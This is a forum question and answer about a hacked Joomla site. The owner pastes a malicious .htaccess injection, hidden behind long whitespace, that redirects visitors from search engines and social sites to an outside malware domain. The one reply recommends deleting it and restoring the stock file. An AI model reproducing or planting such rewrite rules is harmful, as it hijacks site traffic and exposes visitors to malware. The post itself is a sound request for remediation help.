# Joomla: Seeking advice on correctingr an .htaccess file malware issue

Tags: joomla

Seeking some advice here.

I run a website and forum that is based off (an old version) of Joomla. All was well for 4 years til the weekend, when users started getting warnings from Anti-Virus software that malware was present on the site.

Have run the Google Webmaster tools and it pointed to malware being present in the .htaccess file.

Sure enough, I can see that the .htaccess file was indeed updated on the morning the Malware reports started. I've read some other q's on here which suggest that this is not uncommon........ and I've also read some suggestions that you may or may not even need an .ht access file.

What I found was this:

RewriteEngine On
                                                                                    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace).(.*)
                                                                                    RewriteRule ^(.*)$ http://laspector.pro/cyrculate?8 [R=301,L]
                                                                                    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*)
                                                                                    RewriteRule ^(.*)$ http://laspector.pro/cyrculate?8 [R=301,L]
                                                                                    /IfModule>
The specific item in there that the Malware check referred to was the Laspector.

So, my questions are these:

1. Can I safely delete the .content of the .htaccess file, or some subset ot it?
2. Do we even need an .htaccess file?

The website is open access (no sign in necessary), the forum requires registration and sign in, if that is relevant.

Thanks for any advice anyone can offer.

Answer (score 0):

.htaccess files are needed if your going to use SEF urls. I know it has other applications - its just that's most frequently used - so yes they are important to Joomla in that respect - although not compulsory by any means - if you don't use any features in it - you don't need it I don't think!

You should be absolutely fine removing all of what you have above there. However I would advise that you replace it with the .htaccess file from whatever branch of Joomla your using!!